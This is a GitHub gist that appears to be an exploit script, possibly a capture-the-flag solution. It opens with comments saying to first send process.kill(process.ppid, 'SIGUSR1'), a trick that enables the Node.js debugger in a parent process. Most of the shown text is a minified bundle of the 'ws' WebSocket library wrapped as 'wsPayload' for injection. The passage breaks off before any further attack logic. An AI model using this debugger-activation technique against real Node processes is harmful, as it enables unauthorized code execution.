Skip to content

Instantly share code, notes, and snippets.

@strellic
Created August 26, 2024 15:39
Show Gist options
  • Save strellic/48e797fd875c09636919f4de3a2911c6 to your computer and use it in GitHub Desktop.
Save strellic/48e797fd875c09636919f4de3a2911c6 to your computer and use it in GitHub Desktop.
// first send this, then send the whole script
// process.kill(process.ppid, "SIGUSR1")
const fs = require("fs");
const wsPayload = `(()=>{var __webpack_modules__={296(e,t,s){"use strict";let i=s(81);i.createWebSocketStream=s(25),i.Server=s(143),i.Receiver=s(315),i.Sender=s(675),i.WebSocket=i,i.WebSocketServer=i.Server,e.exports=i},728(e,t,s){"use strict";let{EMPTY_BUFFER:i}=s(742),r=Buffer[Symbol.species];function o(e,t){if(0===e.length)return i;if(1===e.length)return e[0];let s=Buffer.allocUnsafe(t),o=0;for(let n=0;n<e.length;n++){let a=e[n];s.set(a,o),o+=a.length}return o<t?new r(s.buffer,s.byteOffset,o):s}function n(e,t,s,i,r){for(let o=0;o<r;o++)s[i+o]=e[o]^t[3&o]}function a(e,t){for(let s=0;s<e.length;s++)e[s]^=t[3&s]}function h(e){return e.length===e.buffer.byteLength?e.buffer:e.buffer.slice(e.byteOffset,e.byteOffset+e.length)}function l(e){if(l.readOnly=!0,Buffer.isBuffer(e))return e;let t;return e instanceof ArrayBuffer?t=new r(e):ArrayBuffer.isView(e)?t=new r(e.buffer,e.byteOffset,e.byteLength):(t=Buffer.from(e),l.readOnly=!1),t}if(e.exports={concat:o,mask:n,toArrayBuffer:h,toBuffer:l,unmask:a},!process.env.WS_NO_BUFFER_UTIL)try{let c=s(488);e.exports.mask=function(e,t,s,i,r){r<48?n(e,t,s,i,r):c.mask(e,t,s,i,r)},e.exports.unmask=function(e,t){e.length<32?a(e,t):c.unmask(e,t)}}catch(d){}},742(e){"use strict";let t=["nodebuffer","arraybuffer","fragments"],s="undefined"!=typeof Blob;s&&t.push("blob"),e.exports={BINARY_TYPES:t,EMPTY_BUFFER:Buffer.alloc(0),GUID:"258EAFA5-E914-47DA-95CA-C5AB0DC85B11",hasBlob:s,kForOnEventAttribute:Symbol("kIsForOnEventAttribute"),kListener:Symbol("kListener"),kStatusCode:Symbol("status-code"),kWebSocket:Symbol("websocket"),NOOP(){}}},463(e,t,s){"use strict";let{kForOnEventAttribute:i,kListener:r}=s(742),o=Symbol("kCode"),n=Symbol("kData"),a=Symbol("kError"),h=Symbol("kMessage"),l=Symbol("kReason"),c=Symbol("kTarget"),d=Symbol("kType"),f=Symbol("kWasClean");class u{constructor(e){this[c]=null,this[d]=e}get target(){return this[c]}get type(){return this[d]}}Object.defineProperty(u.prototype,"target",{enumerable:!0}),Object.defineProperty(u.prototype,"type",{enumerable:!0});class $ extends u{constructor(e,t={}){super(e),this[o]=void 0===t.code?0:t.code,this[l]=void 0===t.reason?"":t.reason,this[f]=void 0!==t.wasClean&&t.wasClean}get code(){return this[o]}get reason(){return this[l]}get wasClean(){return this[f]}}Object.defineProperty($.prototype,"code",{enumerable:!0}),Object.defineProperty($.prototype,"reason",{enumerable:!0}),Object.defineProperty($.prototype,"wasClean",{enumerable:!0});class p extends u{constructor(e,t={}){super(e),this[a]=void 0===t.error?null:t.error,this[h]=void 0===t.message?"":t.message}get error(){return this[a]}get message(){return this[h]}}Object.defineProperty(p.prototype,"error",{enumerable:!0}),Object.defineProperty(p.prototype,"message",{enumerable:!0});class m extends u{constructor(e,t={}){super(e),this[n]=void 0===t.data?null:t.data}get data(){return this[n]}}Object.defineProperty(m.prototype,"data",{enumerable:!0});let _={addEventListener(e,t,s={}){for(let o of this.listeners(e))if(!s[i]&&o[r]===t&&!o[i])return;let n;if("message"===e)n=function e(s,i){let r=new m("message",{data:i?s:s.toString()});r[c]=this,g(t,this,r)};else if("close"===e)n=function e(s,i){let r=new $("close",{code:s,reason:i.toString(),wasClean:this._closeFrameReceived&&this._closeFrameSent});r[c]=this,g(t,this,r)};else if("error"===e)n=function e(s){let i=new p("error",{error:s,message:s.message});i[c]=this,g(t,this,i)};else{if("open"!==e)return;n=function e(){let s=new u("open");s[c]=this,g(t,this,s)}}n[i]=!!s[i],n[r]=t,s.once?this.once(e,n):this.on(e,n)},removeEventListener(e,t){for(let s of this.listeners(e))if(s[r]===t&&!s[i]){this.removeListener(e,s);break}}};function g(e,t,s){"object"==typeof e&&e.handleEvent?e.handleEvent.call(e,s):e.call(t,s)}e.exports={CloseEvent:$,ErrorEvent:p,Event:u,EventTarget:_,MessageEvent:m}},991(e,t,s){"use strict";let{tokenChars:i}=s(883);function r(e,t,s){void 0===e[t]?e[t]=[s]:e[t].push(s)}function o(e){let t=Object.create(null),s=Object.create(null),o=!1,n=!1,a=!1,h,l,c=-1,d=-1,f=-1,u=0;for(;u<e.length;u++)if(d=e.charCodeAt(u),void 0===h){if(-1===f&&1===i[d])-1===c&&(c=u);else if(0!==u&&(32===d||9===d))-1===f&&-1!==c&&(f=u);else if(59===d||44===d){if(-1===c)throw SyntaxError(`Unexpected character at index ${u}`);-1===f&&(f=u);let $=e.slice(c,f);44===d?(r(t,$,s),s=Object.create(null)):h=$,c=f=-1}else throw SyntaxError(`Unexpected character at index ${u}`)}else if(void 0===l){if(-1===f&&1===i[d])-1===c&&(c=u);else if(32===d||9===d)-1===f&&-1!==c&&(f=u);else if(59===d||44===d){if(-1===c)throw SyntaxError(`Unexpected character at index ${u}`);-1===f&&(f=u),r(s,e.slice(c,f),!0),44===d&&(r(t,h,s),s=Object.create(null),h=void 0),c=f=-1}else if(61===d&&-1!==c&&-1===f)l=e.slice(c,u),c=f=-1;else throw SyntaxError(`Unexpected character at index ${u}`)}else if(n){if(1!==i[d])throw SyntaxError(`Unexpected character at index ${u}`);-1===c?c=u:o||(o=!0),n=!1}else if(a){if(1===i[d])-1===c&&(c=u);else if(34===d&&-1!==c)a=!1,f=u;else if(92===d)n=!0;else throw SyntaxError(`Unexpected character at index ${u}`)}else if(34===d&&61===e.charCodeAt(u-1))a=!0;else if(-1===f&&1===i[d])-1===c&&(c=u);else if(-1!==c&&(32===d||9===d))-1===f&&(f=u);else if(59===d||44===d){if(-1===c)throw SyntaxError(`Unexpected character at index ${u}`);-1===f&&(f=u);let p=e.slice(c,f);o&&(p=p.replace(/\\/g,""),o=!1),r(s,l,p),44===d&&(r(t,h,s),s=Object.create(null),h=void 0),l=void 0,c=f=-1}else throw SyntaxError(`Unexpected character at index ${u}`);if(-1===c||a||32===d||9===d)throw SyntaxError("Unexpected end of input");-1===f&&(f=u);let m=e.slice(c,f);return void 0===h?r(t,m,s):(void 0===l?r(s,m,!0):o?r(s,l,m.replace(/\\/g,"")):r(s,l,m),r(t,h,s)),t}function n(e){return Object.keys(e).map(t=>{let s=e[t];return Array.isArray(s)||(s=[s]),s.map(e=>[t].concat(Object.keys(e).map(t=>{let s=e[t];return Array.isArray(s)||(s=[s]),s.map(e=>!0===e?t:`${t}=${e}`).join("; ")})).join("; ")).join(", ")}).join(", ")}e.exports={format:n,parse:o}},154(e){"use strict";let t=Symbol("kDone"),s=Symbol("kRun");class i{constructor(e){this[t]=()=>{this.pending--,this[s]()},this.concurrency=e||1/0,this.jobs=[],this.pending=0}add(e){this.jobs.push(e),this[s]()}[s](){if(this.pending!==this.concurrency&&this.jobs.length){let e=this.jobs.shift();this.pending++,e(this[t])}}}e.exports=i},658(e,t,s){"use strict";let i=s(796),r=s(728),o=s(154),{kStatusCode:n}=s(742),a=Buffer[Symbol.species],h=Buffer.from([0,0,255,255]),l=Symbol("permessage-deflate"),c=Symbol("total-length"),d=Symbol("callback"),f=Symbol("buffers"),u=Symbol("error"),$;class p{constructor(e,t,s){if(this._maxPayload=0|s,this._options=e||{},this._threshold=void 0!==this._options.threshold?this._options.threshold:1024,this._isServer=!!t,this._deflate=null,this._inflate=null,this.params=null,!$){let i=void 0!==this._options.concurrencyLimit?this._options.concurrencyLimit:10;$=new o(i)}}static get extensionName(){return"permessage-deflate"}offer(){let e={};return this._options.serverNoContextTakeover&&(e.server_no_context_takeover=!0),this._options.clientNoContextTakeover&&(e.client_no_context_takeover=!0),this._options.serverMaxWindowBits&&(e.server_max_window_bits=this._options.serverMaxWindowBits),this._options.clientMaxWindowBits?e.client_max_window_bits=this._options.clientMaxWindowBits:null==this._options.clientMaxWindowBits&&(e.client_max_window_bits=!0),e}accept(e){return e=this.normalizeParams(e),this.params=this._isServer?this.acceptAsServer(e):this.acceptAsClient(e),this.params}cleanup(){if(this._inflate&&(this._inflate.close(),this._inflate=null),this._deflate){let e=this._deflate[d];this._deflate.close(),this._deflate=null,e&&e(Error("The deflate stream was closed while data was being processed"))}}acceptAsServer(e){let t=this._options,s=e.find(e=>(!1!==t.serverNoContextTakeover||!e.server_no_context_takeover)&&(!e.server_max_window_bits||!1!==t.serverMaxWindowBits&&("number"!=typeof t.serverMaxWindowBits||!(t.serverMaxWindowBits>e.server_max_window_bits)))&&("number"!=typeof t.clientMaxWindowBits||!!e.client_max_window_bits));if(!s)throw Error("None of the extension offers can be accepted");return t.serverNoContextTakeover&&(s.server_no_context_takeover=!0),t.clientNoContextTakeover&&(s.client_no_context_takeover=!0),"number"==typeof t.serverMaxWindowBits&&(s.server_max_window_bits=t.serverMaxWindowBits),"number"==typeof t.clientMaxWindowBits?s.client_max_window_bits=t.clientMaxWindowBits:(!0===s.client_max_window_bits||!1===t.clientMaxWindowBits)&&delete s.client_max_window_bits,s}acceptAsClient(e){let t=e[0];if(!1===this._options.clientNoContextTakeover&&t.client_no_context_takeover)throw Error('Unexpected parameter "client_no_context_takeover"');if(t.client_max_window_bits){if(!1===this._options.clientMaxWindowBits||"number"==typeof this._options.clientMaxWindowBits&&t.client_max_window_bits>this._options.clientMaxWindowBits)throw Error('Unexpected or invalid parameter "client_max_window_bits"')}else"number"==typeof this._options.clientMaxWindowBits&&(t.client_max_window_bits=this._options.clientMaxWindowBits);return t}normalizeParams(e){return e.forEach(e=>{Object.keys(e).forEach(t=>{let s=e[t];if(s.length>1)throw Error(`Parameter "${t}" must have only a single value`);if(s=s[0],"client_max_window_bits"===t){if(!0!==s){let i=+s;if(!Number.isInteger(i)||i<8||i>15)throw TypeError(`Invalid value for parameter "${t}": ${s}`);s=i}else if(!this._isServer)throw TypeError(`Invalid value for parameter "${t}": ${s}`)}else if("server_max_window_bits"===t){let r=+s;if(!Number.isInteger(r)||r<8||r>15)throw TypeError(`Invalid value for parameter "${t}": ${s}`);s=r}else if("client_no_context_takeover"===t||"server_no_context_takeover"===t){if(!0!==s)throw TypeError(`Invalid value for parameter "${t}": ${s}`)}else throw Error(`Unknown parameter "${t}"`);e[t]=s})}),e}decompress(e,t,s){$.add(i=>{this._decompress(e,t,(e,t)=>{i(),s(e,t)})})}compress(e,t,s){$.add(i=>{this._compress(e,t,(e,t)=>{i(),s(e,t)})})}_decompress(e,t,s){let o=this._isServer?"client":"server";if(!this._inflate){let n=`${o}_max_window_bits`,a="number"!=typeof this.params[n]?i.Z_DEFAULT_WINDOWBITS:this.params[n];this._inflate=i.createInflateRaw({...this._options.zlibInflateOptions,windowBits:a}),this._inflate[l]=this,this._inflate[c]=0,this._inflate[f]=[],this._inflate.on("error",g),this._inflate.on("data",_)}this._inflate[d]=s,this._inflate.write(e),t&&this._inflate.write(h),this._inflate.flush(()=>{let e=this._inflate[u];if(e){this._inflate.close(),this._inflate=null,s(e);return}let i=r.concat(this._inflate[f],this._inflate[c]);this._inflate._readableState.endEmitted?(this._inflate.close(),this._inflate=null):(this._inflate[c]=0,this._inflate[f]=[],t&&this.params[`${o}_no_context_takeover`]&&this._inflate.reset()),s(null,i)})}_compress(e,t,s){let o=this._isServer?"server":"client";if(!this._deflate){let n=`${o}_max_window_bits`,h="number"!=typeof this.params[n]?i.Z_DEFAULT_WINDOWBITS:this.params[n];this._deflate=i.createDeflateRaw({...this._options.zlibDeflateOptions,windowBits:h}),this._deflate[c]=0,this._deflate[f]=[],this._deflate.on("data",m)}this._deflate[d]=s,this._deflate.write(e),this._deflate.flush(i.Z_SYNC_FLUSH,()=>{if(!this._deflate)return;let e=r.concat(this._deflate[f],this._deflate[c]);t&&(e=new a(e.buffer,e.byteOffset,e.length-4)),this._deflate[d]=null,this._deflate[c]=0,this._deflate[f]=[],t&&this.params[`${o}_no_context_takeover`]&&this._deflate.reset(),s(null,e)})}}function m(e){this[f].push(e),this[c]+=e.length}function _(e){if(this[c]+=e.length,this[l]._maxPayload<1||this[c]<=this[l]._maxPayload){this[f].push(e);return}this[u]=RangeError("Max payload size exceeded"),this[u].code="WS_ERR_UNSUPPORTED_MESSAGE_LENGTH",this[u][n]=1009,this.removeListener("data",_),this.reset()}function g(e){this[l]._inflate=null,e[n]=1007,this[d](e)}e.exports=p},315(e,t,s){"use strict";let{Writable:i}=s(781),r=s(658),{BINARY_TYPES:o,EMPTY_BUFFER:n,kStatusCode:a,kWebSocket:h}=s(742),{concat:l,toArrayBuffer:c,unmask:d}=s(728),{isValidStatusCode:f,isValidUTF8:u}=s(883),$=Buffer[Symbol.species],p=0,m=1,_=2,g=3,y=4,x=5,v=6;class b extends i{constructor(e={}){super(),this._allowSynchronousEvents=void 0===e.allowSynchronousEvents||e.allowSynchronousEvents,this._binaryType=e.binaryType||o[0],this._extensions=e.extensions||{},this._isServer=!!e.isServer,this._maxPayload=0|e.maxPayload,this._skipUTF8Validation=!!e.skipUTF8Validation,this[h]=void 0,this._bufferedBytes=0,this._buffers=[],this._compressed=!1,this._payloadLength=0,this._mask=void 0,this._fragmented=0,this._masked=!1,this._fin=!1,this._opcode=0,this._totalPayloadLength=0,this._messageLength=0,this._fragments=[],this._errored=!1,this._loop=!1,this._state=p}_write(e,t,s){if(8===this._opcode&&this._state==p)return s();this._bufferedBytes+=e.length,this._buffers.push(e),this.startLoop(s)}consume(e){if(this._bufferedBytes-=e,e===this._buffers[0].length)return this._buffers.shift();if(e<this._buffers[0].length){let t=this._buffers[0];return this._buffers[0]=new $(t.buffer,t.byteOffset+e,t.length-e),new $(t.buffer,t.byteOffset,e)}let s=Buffer.allocUnsafe(e);do{let i=this._buffers[0],r=s.length-e;e>=i.length?s.set(this._buffers.shift(),r):(s.set(new Uint8Array(i.buffer,i.byteOffset,e),r),this._buffers[0]=new $(i.buffer,i.byteOffset+e,i.length-e)),e-=i.length}while(e>0);return s}startLoop(e){this._loop=!0;do switch(this._state){case p:this.getInfo(e);break;case m:this.getPayloadLength16(e);break;case _:this.getPayloadLength64(e);break;case g:this.getMask();break;case y:this.getData(e);break;case x:case v:this._loop=!1;return}while(this._loop);this._errored||e()}getInfo(e){if(this._bufferedBytes<2){this._loop=!1;return}let t=this.consume(2);if((48&t[0])!=0){let s=this.createError(RangeError,"RSV2 and RSV3 must be clear",!0,1002,"WS_ERR_UNEXPECTED_RSV_2_3");e(s);return}let i=(64&t[0])==64;if(i&&!this._extensions[r.extensionName]){let o=this.createError(RangeError,"RSV1 must be clear",!0,1002,"WS_ERR_UNEXPECTED_RSV_1");e(o);return}if(this._fin=(128&t[0])==128,this._opcode=15&t[0],this._payloadLength=127&t[1],0===this._opcode){if(i){let n=this.createError(RangeError,"RSV1 must be clear",!0,1002,"WS_ERR_UNEXPECTED_RSV_1");e(n);return}if(!this._fragmented){let a=this.createError(RangeError,"invalid opcode 0",!0,1002,"WS_ERR_INVALID_OPCODE");e(a);return}this._opcode=this._fragmented}else if(1===this._opcode||2===this._opcode){if(this._fragmented){let h=this.createError(RangeError,`invalid opcode ${this._opcode}`,!0,1002,"WS_ERR_INVALID_OPCODE");e(h);return}this._compressed=i}else if(this._opcode>7&&this._opcode<11){if(!this._fin){let l=this.createError(RangeError,"FIN must be set",!0,1002,"WS_ERR_EXPECTED_FIN");e(l);return}if(i){let c=this.createError(RangeError,"RSV1 must be clear",!0,1002,"WS_ERR_UNEXPECTED_RSV_1");e(c);return}if(this._payloadLength>125||8===this._opcode&&1===this._payloadLength){let d=this.createError(RangeError,`invalid payload length ${this._payloadLength}`,!0,1002,"WS_ERR_INVALID_CONTROL_PAYLOAD_LENGTH");e(d);return}}else{let f=this.createError(RangeError,`invalid opcode ${this._opcode}`,!0,1002,"WS_ERR_INVALID_OPCODE");e(f);return}if(this._fin||this._fragmented||(this._fragmented=this._opcode),this._masked=(128&t[1])==128,this._isServer){if(!this._masked){let u=this.createError(RangeError,"MASK must be set",!0,1002,"WS_ERR_EXPECTED_MASK");e(u);return}}else if(this._masked){let $=this.createError(RangeError,"MASK must be clear",!0,1002,"WS_ERR_UNEXPECTED_MASK");e($);return}126===this._payloadLength?this._state=m:127===this._payloadLength?this._state=_:this.haveLength(e)}getPayloadLength16(e){if(this._bufferedBytes<2){this._loop=!1;return}this._payloadLength=this.consume(2).readUInt16BE(0),this.haveLength(e)}getPayloadLength64(e){if(this._bufferedBytes<8){this._loop=!1;return}let t=this.consume(8),s=t.readUInt32BE(0);if(s>2097151){let i=this.createError(RangeError,"Unsupported WebSocket frame: payload length > 2^53 - 1",!1,1009,"WS_ERR_UNSUPPORTED_DATA_PAYLOAD_LENGTH");e(i);return}this._payloadLength=4294967296*s+t.readUInt32BE(4),this.haveLength(e)}haveLength(e){if(this._payloadLength&&this._opcode<8&&(this._totalPayloadLength+=this._payloadLength,this._totalPayloadLength>this._maxPayload&&this._maxPayload>0)){let t=this.createError(RangeError,"Max payload size exceeded",!1,1009,"WS_ERR_UNSUPPORTED_MESSAGE_LENGTH");e(t);return}this._masked?this._state=g:this._state=y}getMask(){if(this._bufferedBytes<4){this._loop=!1;return}this._mask=this.consume(4),this._state=y}getData(e){let t=n;if(this._payloadLength){if(this._bufferedBytes<this._payloadLength){this._loop=!1;return}t=this.consume(this._payloadLength),this._masked&&(this._mask[0]|this._mask[1]|this._mask[2]|this._mask[3])!=0&&d(t,this._mask)}if(this._opcode>7){this.controlMessage(t,e);return}if(this._compressed){this._state=x,this.decompress(t,e);return}t.length&&(this._messageLength=this._totalPayloadLength,this._fragments.push(t)),this.dataMessage(e)}decompress(e,t){let s=this._extensions[r.extensionName];s.decompress(e,this._fin,(e,s)=>{if(e)return t(e);if(s.length){if(this._messageLength+=s.length,this._messageLength>this._maxPayload&&this._maxPayload>0){let i=this.createError(RangeError,"Max payload size exceeded",!1,1009,"WS_ERR_UNSUPPORTED_MESSAGE_LENGTH");t(i);return}this._fragments.push(s)}this.dataMessage(t),this._state===p&&this.startLoop(t)})}dataMessage(e){if(!this._fin){this._state=p;return}let t=this._messageLength,s=this._fragments;if(this._totalPayloadLength=0,this._messageLength=0,this._fragmented=0,this._fragments=[],2===this._opcode){let i;i="nodebuffer"===this._binaryType?l(s,t):"arraybuffer"===this._binaryType?c(l(s,t)):"blob"===this._binaryType?new Blob(s):s,this._allowSynchronousEvents?(this.emit("message",i,!0),this._state=p):(this._state=v,setImmediate(()=>{this.emit("message",i,!0),this._state=p,this.startLoop(e)}))}else{let r=l(s,t);if(!this._skipUTF8Validation&&!u(r)){let o=this.createError(Error,"invalid UTF-8 sequence",!0,1007,"WS_ERR_INVALID_UTF8");e(o);return}this._state===x||this._allowSynchronousEvents?(this.emit("message",r,!1),this._state=p):(this._state=v,setImmediate(()=>{this.emit("message",r,!1),this._state=p,this.startLoop(e)}))}}controlMessage(e,t){if(8===this._opcode){if(0===e.length)this._loop=!1,this.emit("conclude",1005,n),this.end();else{let s=e.readUInt16BE(0);if(!f(s)){let i=this.createError(RangeError,`invalid status code ${s}`,!0,1002,"WS_ERR_INVALID_CLOSE_CODE");t(i);return}let r=new $(e.buffer,e.byteOffset+2,e.length-2);if(!this._skipUTF8Validation&&!u(r)){let o=this.createError(Error,"invalid UTF-8 sequence",!0,1007,"WS_ERR_INVALID_UTF8");t(o);return}this._loop=!1,this.emit("conclude",s,r),this.end()}this._state=p;return}this._allowSynchronousEvents?(this.emit(9===this._opcode?"ping":"pong",e),this._state=p):(this._state=v,setImmediate(()=>{this.emit(9===this._opcode?"ping":"pong",e),this._state=p,this.startLoop(t)}))}createError(e,t,s,i,r){this._loop=!1,this._errored=!0;let o=new e(s?`Invalid WebSocket frame: ${t}`:t);return Error.captureStackTrace(o,this.createError),o.code=r,o[a]=i,o}}e.exports=b},675(e,t,s){"use strict";let{Duplex:i}=s(781),{randomFillSync:r}=s(113),o=s(658),{EMPTY_BUFFER:n,kWebSocket:a,NOOP:h}=s(742),{isBlob:l,isValidStatusCode:c}=s(883),{mask:d,toBuffer:f}=s(728),u=Symbol("kByteLength"),$=Buffer.alloc(4),p=8192,m,_=p,g=0,y=1,x=2;class v{constructor(e,t,s){this._extensions=t||{},s&&(this._generateMask=s,this._maskBuffer=Buffer.alloc(4)),this._socket=e,this._firstFragment=!0,this._compress=!1,this._bufferedBytes=0,this._queue=[],this._state=g,this.onerror=h,this[a]=void 0}static frame(e,t){let s,i=!1,o=2,n=!1;t.mask&&(s=t.maskBuffer||$,t.generateMask?t.generateMask(s):(_===p&&(void 0===m&&(m=Buffer.alloc(p)),r(m,0,p),_=0),s[0]=m[_++],s[1]=m[_++],s[2]=m[_++],s[3]=m[_++]),n=(s[0]|s[1]|s[2]|s[3])==0,o=6);let a;"string"==typeof e?a=(!t.mask||n)&&void 0!==t[u]?t[u]:(e=Buffer.from(e)).length:(a=e.length,i=t.mask&&t.readOnly&&!n);let h=a;a>=65536?(o+=8,h=127):a>125&&(o+=2,h=126);let l=Buffer.allocUnsafe(i?a+o:o);return(l[0]=t.fin?128|t.opcode:t.opcode,t.rsv1&&(l[0]|=64),l[1]=h,126===h?l.writeUInt16BE(a,2):127===h&&(l[2]=l[3]=0,l.writeUIntBE(a,4,6)),t.mask)?(l[1]|=128,l[o-4]=s[0],l[o-3]=s[1],l[o-2]=s[2],l[o-1]=s[3],n)?[l,e]:i?(d(e,s,l,o,a),[l]):(d(e,s,e,0,a),[l,e]):[l,e]}close(e,t,s,i){let r;if(void 0===e)r=n;else if("number"==typeof e&&c(e)){if(void 0!==t&&t.length){let o=Buffer.byteLength(t);if(o>123)throw RangeError("The message must not be greater than 123 bytes");(r=Buffer.allocUnsafe(2+o)).writeUInt16BE(e,0),"string"==typeof t?r.write(t,2):r.set(t,2)}else(r=Buffer.allocUnsafe(2)).writeUInt16BE(e,0)}else throw TypeError("First argument must be a valid error code number");let a={[u]:r.length,fin:!0,generateMask:this._generateMask,mask:s,maskBuffer:this._maskBuffer,opcode:8,readOnly:!1,rsv1:!1};this._state!==g?this.enqueue([this.dispatch,r,!1,a,i]):this.sendFrame(v.frame(r,a),i)}ping(e,t,s){let i,r;if("string"==typeof e?(i=Buffer.byteLength(e),r=!1):l(e)?(i=e.size,r=!1):(i=(e=f(e)).length,r=f.readOnly),i>125)throw RangeError("The data size must not be greater than 125 bytes");let o={[u]:i,fin:!0,generateMask:this._generateMask,mask:t,maskBuffer:this._maskBuffer,opcode:9,readOnly:r,rsv1:!1};l(e)?this._state!==g?this.enqueue([this.getBlobData,e,!1,o,s]):this.getBlobData(e,!1,o,s):this._state!==g?this.enqueue([this.dispatch,e,!1,o,s]):this.sendFrame(v.frame(e,o),s)}pong(e,t,s){let i,r;if("string"==typeof e?(i=Buffer.byteLength(e),r=!1):l(e)?(i=e.size,r=!1):(i=(e=f(e)).length,r=f.readOnly),i>125)throw RangeError("The data size must not be greater than 125 bytes");let o={[u]:i,fin:!0,generateMask:this._generateMask,mask:t,maskBuffer:this._maskBuffer,opcode:10,readOnly:r,rsv1:!1};l(e)?this._state!==g?this.enqueue([this.getBlobData,e,!1,o,s]):this.getBlobData(e,!1,o,s):this._state!==g?this.enqueue([this.dispatch,e,!1,o,s]):this.sendFrame(v.frame(e,o),s)}send(e,t,s){let i=this._extensions[o.extensionName],r=t.binary?2:1,n=t.compress,a,h;"string"==typeof e?(a=Buffer.byteLength(e),h=!1):l(e)?(a=e.size,h=!1):(a=(e=f(e)).length,h=f.readOnly),this._firstFragment?(this._firstFragment=!1,n&&i&&i.params[i._isServer?"server_no_context_takeover":"client_no_context_takeover"]&&(n=a>=i._threshold),this._compress=n):(n=!1,r=0),t.fin&&(this._firstFragment=!0);let c={[u]:a,fin:t.fin,generateMask:this._generateMask,mask:t.mask,maskBuffer:this._maskBuffer,opcode:r,readOnly:h,rsv1:n};l(e)?this._state!==g?this.enqueue([this.getBlobData,e,this._compress,c,s]):this.getBlobData(e,this._compress,c,s):this._state!==g?this.enqueue([this.dispatch,e,this._compress,c,s]):this.dispatch(e,this._compress,c,s)}getBlobData(e,t,s,i){this._bufferedBytes+=s[u],this._state=x,e.arrayBuffer().then(e=>{if(this._socket.destroyed){let r=Error("The socket was closed while the blob was being read");process.nextTick(b,this,r,i);return}this._bufferedBytes-=s[u];let o=f(e);t?this.dispatch(o,t,s,i):(this._state=g,this.sendFrame(v.frame(o,s),i),this.dequeue())}).catch(e=>{process.nextTick(S,this,e,i)})}dispatch(e,t,s,i){if(!t){this.sendFrame(v.frame(e,s),i);return}let r=this._extensions[o.extensionName];this._bufferedBytes+=s[u],this._state=y,r.compress(e,s.fin,(e,t)=>{if(this._socket.destroyed){let r=Error("The socket was closed while data was being compressed");b(this,r,i);return}this._bufferedBytes-=s[u],this._state=g,s.readOnly=!1,this.sendFrame(v.frame(t,s),i),this.dequeue()})}dequeue(){for(;this._state===g&&this._queue.length;){let e=this._queue.shift();this._bufferedBytes-=e[3][u],Reflect.apply(e[0],this,e.slice(1))}}enqueue(e){this._bufferedBytes+=e[3][u],this._queue.push(e)}sendFrame(e,t){2===e.length?(this._socket.cork(),this._socket.write(e[0]),this._socket.write(e[1],t),this._socket.uncork()):this._socket.write(e[0],t)}}function b(e,t,s){"function"==typeof s&&s(t);for(let i=0;i<e._queue.length;i++){let r=e._queue[i],o=r[r.length-1];"function"==typeof o&&o(t)}}function S(e,t,s){b(e,t,s),e.onerror(t)}e.exports=v},25(e,t,s){"use strict";s(81);let{Duplex:i}=s(781);function r(e){e.emit("close")}function o(){!this.destroyed&&this._writableState.finished&&this.destroy()}function n(e){this.removeListener("error",n),this.destroy(),0===this.listenerCount("error")&&this.emit("error",e)}function a(e,t){let s=!0,a=new i({...t,autoDestroy:!1,emitClose:!1,objectMode:!1,writableObjectMode:!1});return e.on("message",function t(s,i){let r=!i&&a._readableState.objectMode?s.toString():s;a.push(r)||e.pause()}),e.once("error",function e(t){a.destroyed||(s=!1,a.destroy(t))}),e.once("close",function e(){a.destroyed||a.push(null)}),a._destroy=function(t,i){if(e.readyState===e.CLOSED){i(t),process.nextTick(r,a);return}let o=!1;e.once("error",function e(t){o=!0,i(t)}),e.once("close",function e(){o||i(t),process.nextTick(r,a)}),s&&e.terminate()},a._final=function(t){if(e.readyState===e.CONNECTING){e.once("open",function e(){a._final(t)});return}null!==e._socket&&(e._socket._writableState.finished?(t(),a._readableState.endEmitted&&a.destroy()):(e._socket.once("finish",function e(){t()}),e.close()))},a._read=function(){e.isPaused&&e.resume()},a._write=function(t,s,i){if(e.readyState===e.CONNECTING){e.once("open",function e(){a._write(t,s,i)});return}e.send(t,i)},a.on("end",o),a.on("error",n),a}e.exports=a},697(e,t,s){"use strict";let{tokenChars:i}=s(883);function r(e){let t=new Set,s=-1,r=-1,o=0;for(;o<e.length;o++){let n=e.charCodeAt(o);if(-1===r&&1===i[n])-1===s&&(s=o);else if(0!==o&&(32===n||9===n))-1===r&&-1!==s&&(r=o);else if(44===n){if(-1===s)throw SyntaxError(`Unexpected character at index ${o}`);-1===r&&(r=o);let a=e.slice(s,r);if(t.has(a))throw SyntaxError(`The "${a}" subprotocol is duplicated`);t.add(a),s=r=-1}else throw SyntaxError(`Unexpected character at index ${o}`)}if(-1===s||-1!==r)throw SyntaxError("Unexpected end of input");let h=e.slice(s,o);if(t.has(h))throw SyntaxError(`The "${h}" subprotocol is duplicated`);return t.add(h),t}e.exports={parse:r}},883(e,t,s){"use strict";let{isUtf8:i}=s(300),{hasBlob:r}=s(742),o=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,1,1,1,1,0,0,1,1,0,1,1,0,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,0];function n(e){return e>=1e3&&e<=1014&&1004!==e&&1005!==e&&1006!==e||e>=3e3&&e<=4999}function a(e){let t=e.length,s=0;for(;s<t;)if((128&e[s])==0)s++;else if((224&e[s])==192){if(s+1===t||(192&e[s+1])!=128||(254&e[s])==192)return!1;s+=2}else if((240&e[s])==224){if(s+2>=t||(192&e[s+1])!=128||(192&e[s+2])!=128||224===e[s]&&(224&e[s+1])==128||237===e[s]&&(224&e[s+1])==160)return!1;s+=3}else{if((248&e[s])!=240||s+3>=t||(192&e[s+1])!=128||(192&e[s+2])!=128||(192&e[s+3])!=128||240===e[s]&&(240&e[s+1])==128||244===e[s]&&e[s+1]>143||e[s]>244)return!1;s+=4}return!0}function h(e){return r&&"object"==typeof e&&"function"==typeof e.arrayBuffer&&"string"==typeof e.type&&"function"==typeof e.stream&&("Blob"===e[Symbol.toStringTag]||"File"===e[Symbol.toStringTag])}if(e.exports={isBlob:h,isValidStatusCode:n,isValidUTF8:a,tokenChars:o},i)e.exports.isValidUTF8=function(e){return e.length<24?a(e):i(e)};else if(!process.env.WS_NO_UTF_8_VALIDATE)try{let l=s(365);e.exports.isValidUTF8=function(e){return e.length<32?a(e):l(e)}}catch(c){}},143(e,t,s){"use strict";let 